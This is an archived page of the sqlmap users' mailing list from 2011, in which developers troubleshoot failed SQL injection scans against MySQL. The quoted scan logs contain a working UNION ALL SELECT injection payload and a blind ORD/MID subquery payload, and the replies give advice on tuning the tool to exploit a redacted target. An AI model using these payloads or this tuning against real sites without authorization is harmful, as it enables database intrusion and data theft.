sqlmap-users Mailing List for sqlmap (Page 86)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2011-07-12 21:45:51
|
found one (VM) and done some tests :) you are right, subqueries can't be used on MySQL < 4.1 which means that sql injection there is of no significant value (e.g. dumping of table content which inherently requires subquerying mechanism). kr On Tue, Jul 12, 2011 at 11:23 PM, Miroslav Stampar <mir...@gm...> wrote: > ok, got the point. > > also seen the same thing on Twitter few days ago, maybe it was you :) > > two things: > A) does anyone have experience with subqueries on MySQL < 4.1? > B) is there some VM around that carry for example MySQL 3.x ready for testing? > > kr > > On Tue, Jul 12, 2011 at 1:01 PM, Till .ch <ti...@ho...> wrote: >> Hi >> >> >> Lately I've been playing with sqlmap and a 4.0 mysql server. Sqlmap detected >> the injection point just fine, but struggled with gathering information >> about other tables. >> I guess this happened due to the fact as subqueries have been introduced >> with mysql >=4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html) >> and thus payloads like the following are regarded as an invalid query on >> mysql <4.1: >> >> >> [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) >> FROM randomtable),1,1)) > 51 >> >> >> Best Regards >> Till >> >> ------------------------------------------------------------------------------ >> All of the data generated in your IT infrastructure is seriously valuable. >> Why? It contains a definitive record of application performance, security >> threats, fraudulent activity, and more. Splunk takes this data and makes >> sense of it. IT sense. And common sense. >> http://p.sf.net/sfu/splunk-d2d-c2 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar (@stamparm) > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-07-12 21:23:13
|
ok, got the point. also seen the same thing on Twitter few days ago, maybe it was you :) two things: A) does anyone have experience with subqueries on MySQL < 4.1? B) is there some VM around that carry for example MySQL 3.x ready for testing? kr On Tue, Jul 12, 2011 at 1:01 PM, Till .ch <ti...@ho...> wrote: > Hi > > > Lately I've been playing with sqlmap and a 4.0 mysql server. Sqlmap detected > the injection point just fine, but struggled with gathering information > about other tables. > I guess this happened due to the fact as subqueries have been introduced > with mysql >=4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html) > and thus payloads like the following are regarded as an invalid query on > mysql <4.1: > > > [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) > FROM randomtable),1,1)) > 51 > > > Best Regards > Till > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-07-12 21:17:35
|
ok. i see that you've tried those --time-sec and --technique=U :) now to resume a bit. "Generic UNION injections" are tricky ones. best thing would be if you could send us the -t traffic.txt of --technique=U --flush-session run. kr On Tue, Jul 12, 2011 at 11:13 PM, Miroslav Stampar <mir...@gm...> wrote: > hi all. > > little tutorial for all of you. spot the problematic parts: > > A) > [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from > previous timed based payload. if the problem persists please wait for few minut > es and rerun without flag T in --technique option (e.g. --flush-session --techni > que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) > > B) > .... > [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > ing to retry the request > [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > ing to retry the request > .... > > C) do you want to exploit this SQL injection? [Y/n] Y > [14:40:13] [INFO] testing MySQL > [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > ing to retry the request > [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > ing to retry the request > [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > ing to retry the request > [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the > next form > > now. do you see the problem yourself? > > that warning message says it all. have you tried lowering the > --time-sec value? have you tried running with --technique=BEUS? > > thing is that in INNER JOIN cases injecting TIME BASED payloads can do > lots of "[CRITICAL]" messages. hence that nice warning message :) > > kr > > On Tue, Jul 12, 2011 at 10:49 PM, Bernardo Damele A. G. > <ber...@gm...> wrote: >> Hi Joahnna, >> >> Try to provide --union-char and --union-cols after you have verified >> the UNION query SQL injection manually in your browser. >> Rerun with --flush-session and -t traffic.log and inspect the log file >> afterwards to see if the SQL payload is indeed part of the HTTP >> response you expect it. >> If the fingerprint keeps failing, provide sqlmap with --dbms "mysql 5". >> >> Bernardo >> >> >> On 12 July 2011 14:32, Joahnna Marie Damiao <dam...@ya...> wrote: >>> >>> Hi, >>> Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me? >>> >>> C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --b >>> >>> atch --beep >>> >>> >>> >>> sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool >>> >>> http://www.sqlmap.org >>> >>> >>> >>> [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual >>> >>> consent is illegal. It is the end user's responsibility to obey all applicable >>> >>> local, state and federal laws. Authors assume no liability and are not responsib >>> >>> le for any misuse or damage caused by this program >>> >>> >>> >>> [*] starting at 14:39:37 >>> >>> >>> >>> [14:39:37] [INFO] setting file for logging HTTP traffic >>> >>> [14:39:37] [INFO] testing connection to the target url >>> >>> [14:39:38] [INFO] searching for forms >>> >>> [#1] form: [INFO] >>> >>> GET xxxxxxxxx >>> >>> do you want to test this form? [Y/n/q] >>> >>> > Y >>> >>> Edit GET data [default: xxxxxxxx >>> >>> do you want to fill blank fields with random values? [Y/n] Y >>> >>> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as sessi >>> >>> on file >>> >>> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' >>> >>> as results file >>> >>> [14:39:38] [INFO] testing if the url is stable, wait a few seconds >>> >>> [14:39:39] [INFO] url is stable >>> >>> [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic >>> >>> [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic >>> >>> [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might n >>> >>> ot be injectable >>> >>> [14:39:39] [INFO] testing sql injection on GET parameter 'productid' >>> >>> [14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >>> >>> [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause >>> >>> ' >>> >>> [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' >>> >>> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o >>> >>> r HAVING clause' >>> >>> [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT >>> >>> ype)' >>> >>> [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries' >>> >>> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >>> >>> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >>> >>> [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >>> >>> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >>> >>> [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >>> >>> [14:39:41] [INFO] testing 'Oracle AND time-based blind' >>> >>> [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >>> >>> [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >>> >>> [14:39:42] [WARNING] using unescaped version of the test because of zero knowled >>> >>> ge of the back-end DBMS. you can try to explicitly set it using the --dbms optio >>> >>> n >>> >>> [14:39:44] [WARNING] GET parameter 'productid' is not injectable >>> >>> [14:39:44] [INFO] testing if GET parameter 'name' is dynamic >>> >>> [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic >>> >>> [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be >>> >>> injectable >>> >>> [14:39:44] [INFO] testing sql injection on GET parameter 'name' >>> >>> [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >>> >>> [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause >>> >>> ' >>> >>> [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' >>> >>> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o >>> >>> r HAVING clause' >>> >>> [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT >>> >>> ype)' >>> >>> [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' >>> >>> [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >>> >>> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >>> >>> [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >>> >>> [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >>> >>> [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >>> >>> [14:39:46] [INFO] testing 'Oracle AND time-based blind' >>> >>> [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >>> >>> [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >>> >>> [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:51] [WARNING] GET parameter 'name' is not injectable >>> >>> [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic >>> >>> [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic >>> >>> [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might no >>> >>> t be injectable >>> >>> [14:39:52] [INFO] testing sql injection on GET parameter 'filename' >>> >>> [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >>> >>> [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause >>> >>> ' >>> >>> [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' >>> >>> [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o >>> >>> r HAVING clause' >>> >>> [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT >>> >>> ype)' >>> >>> [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries' >>> >>> [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >>> >>> [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >>> >>> [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from >>> >>> previous timed based payload. if the problem persists please wait for few minut >>> >>> es and rerun without flag T in --technique option (e.g. --flush-session --techni >>> >>> que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) >>> >>> [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >>> >>> [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >>> >>> [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >>> >>> [14:39:56] [INFO] testing 'Oracle AND time-based blind' >>> >>> [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >>> >>> [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >>> >>> [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:09] [CRITICAL] unable to connect to the target url or proxy >>> >>> [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns >>> >>> [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:13] [CRITICAL] unable to connect to the target url or proxy >>> >>> [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to >>> >>> 10 columns' injectable >>> >>> GET parameter 'filename' is vulnerable. Do you want to keep testing the others? >>> >>> [y/N] N >>> >>> sqlmap identified the following injection points with a total of 414 HTTP(s) req >>> >>> uests: >>> >>> --- >>> >>> Place: GET >>> >>> Parameter: filename >>> >>> Type: UNION query >>> >>> Title: Generic UNION query (NULL) - 1 to 10 columns >>> >>> Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsD >>> >>> iekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&cre >>> >>> ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti >>> >>> ve=on&comment=uPni >>> >>> --- >>> >>> >>> >>> do you want to exploit this SQL injection? [Y/n] Y >>> >>> [14:40:13] [INFO] testing MySQL >>> >>> [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the >>> >>> next form >>> >>> [14:40:16] [INFO] you can find results of scanning in multiple targets mode insi >>> >>> de the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' >>> >>> >>> >>> [*] shutting down at 14:40:16 >>> >>> ------------------------------------------------------------------------------ >>> All of the data generated in your IT infrastructure is seriously valuable. >>> Why? It contains a definitive record of application performance, security >>> threats, fraudulent activity, and more. Splunk takes this data and makes >>> sense of it. IT sense. And common sense. >>> http://p.sf.net/sfu/splunk-d2d-c2 >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: Unavailable >> >> ------------------------------------------------------------------------------ >> AppSumo Presents a FREE Video for the SourceForge Community by Eric >> Ries, the creator of the Lean Startup Methodology on "Lean Startup >> Secrets Revealed." This video shows you how to validate your ideas, >> optimize your ideas and identify your business strategy. >> http://p.sf.net/sfu/appsumosfdev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar (@stamparm) > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-07-12 21:13:35
|
hi all. little tutorial for all of you. spot the problematic parts: A) [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minut es and rerun without flag T in --technique option (e.g. --flush-session --techni que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) B) .... [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request .... C) do you want to exploit this SQL injection? [Y/n] Y [14:40:13] [INFO] testing MySQL [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form now. do you see the problem yourself? that warning message says it all. have you tried lowering the --time-sec value? have you tried running with --technique=BEUS? thing is that in INNER JOIN cases injecting TIME BASED payloads can do lots of "[CRITICAL]" messages. hence that nice warning message :) kr On Tue, Jul 12, 2011 at 10:49 PM, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi Joahnna, > > Try to provide --union-char and --union-cols after you have verified > the UNION query SQL injection manually in your browser. > Rerun with --flush-session and -t traffic.log and inspect the log file > afterwards to see if the SQL payload is indeed part of the HTTP > response you expect it. > If the fingerprint keeps failing, provide sqlmap with --dbms "mysql 5". > > Bernardo > > > On 12 July 2011 14:32, Joahnna Marie Damiao <dam...@ya...> wrote: >> >> Hi, >> Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me? >> >> C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --b >> >> atch --beep >> >> >> >> sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool >> >> http://www.sqlmap.org >> >> >> >> [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual >> >> consent is illegal. It is the end user's responsibility to obey all applicable >> >> local, state and federal laws. Authors assume no liability and are not responsib >> >> le for any misuse or damage caused by this program >> >> >> >> [*] starting at 14:39:37 >> >> >> >> [14:39:37] [INFO] setting file for logging HTTP traffic >> >> [14:39:37] [INFO] testing connection to the target url >> >> [14:39:38] [INFO] searching for forms >> >> [#1] form: [INFO] >> >> GET xxxxxxxxx >> >> do you want to test this form? [Y/n/q] >> >> > Y >> >> Edit GET data [default: xxxxxxxx >> >> do you want to fill blank fields with random values? [Y/n] Y >> >> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as sessi >> >> on file >> >> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' >> >> as results file >> >> [14:39:38] [INFO] testing if the url is stable, wait a few seconds >> >> [14:39:39] [INFO] url is stable >> >> [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic >> >> [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic >> >> [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might n >> >> ot be injectable >> >> [14:39:39] [INFO] testing sql injection on GET parameter 'productid' >> >> [14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >> >> [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> >> ' >> >> [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' >> >> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o >> >> r HAVING clause' >> >> [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT >> >> ype)' >> >> [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> >> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >> >> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >> >> [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> >> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >> >> [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >> >> [14:39:41] [INFO] testing 'Oracle AND time-based blind' >> >> [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> >> [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> >> [14:39:42] [WARNING] using unescaped version of the test because of zero knowled >> >> ge of the back-end DBMS. you can try to explicitly set it using the --dbms optio >> >> n >> >> [14:39:44] [WARNING] GET parameter 'productid' is not injectable >> >> [14:39:44] [INFO] testing if GET parameter 'name' is dynamic >> >> [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic >> >> [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be >> >> injectable >> >> [14:39:44] [INFO] testing sql injection on GET parameter 'name' >> >> [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >> >> [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> >> ' >> >> [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' >> >> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o >> >> r HAVING clause' >> >> [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT >> >> ype)' >> >> [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> >> [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >> >> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >> >> [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> >> [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >> >> [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >> >> [14:39:46] [INFO] testing 'Oracle AND time-based blind' >> >> [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> >> [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> >> [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:39:51] [WARNING] GET parameter 'name' is not injectable >> >> [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic >> >> [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic >> >> [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might no >> >> t be injectable >> >> [14:39:52] [INFO] testing sql injection on GET parameter 'filename' >> >> [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >> >> [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> >> ' >> >> [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' >> >> [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o >> >> r HAVING clause' >> >> [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT >> >> ype)' >> >> [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> >> [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >> >> [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >> >> [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from >> >> previous timed based payload. if the problem persists please wait for few minut >> >> es and rerun without flag T in --technique option (e.g. --flush-session --techni >> >> que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) >> >> [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> >> [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >> >> [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >> >> [14:39:56] [INFO] testing 'Oracle AND time-based blind' >> >> [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> >> [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> >> [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:09] [CRITICAL] unable to connect to the target url or proxy >> >> [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns >> >> [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:13] [CRITICAL] unable to connect to the target url or proxy 